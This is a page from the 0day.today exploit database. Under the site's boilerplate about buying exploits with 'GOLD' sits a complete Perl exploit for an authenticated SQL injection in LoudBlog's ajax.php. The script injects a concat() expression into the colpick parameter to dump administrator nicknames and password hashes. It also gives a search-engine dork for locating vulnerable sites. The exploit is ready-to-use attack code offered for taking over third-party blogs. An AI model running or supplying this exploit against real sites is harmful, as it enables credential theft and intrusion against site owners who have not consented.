0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)
================================================================ LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth) ================================================================ #!/usr/bin/perl # This Exploit requires a valid user name and password of an account regardless of the permissions # # Author: Xianur0 # Affected: All Versions # Bug: SQL Injection # # Doorks: # allintext: "powered by LoudBlog" use HTTP::Request::Common qw(POST); use LWP::UserAgent; use Digest::MD5 qw(md5_hex); $ua = LWP::UserAgent->new; print "\n LoudBlog Exploit All Version By Xianur0\n\n"; $uri = $ARGV[0]; $id = $ARGV[1]; $password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n"); $md5 = md5_hex($ARGV[2]).":".md5_hex($password); my $req = POST $uri.'/loudblog/ajax.php', [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread']; $req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17'); $req->header('Cookie' => 'lbauth='.$md5); $res = $ua->request($req); print $res->content."\n"; # 0day.today [2024-07-07] #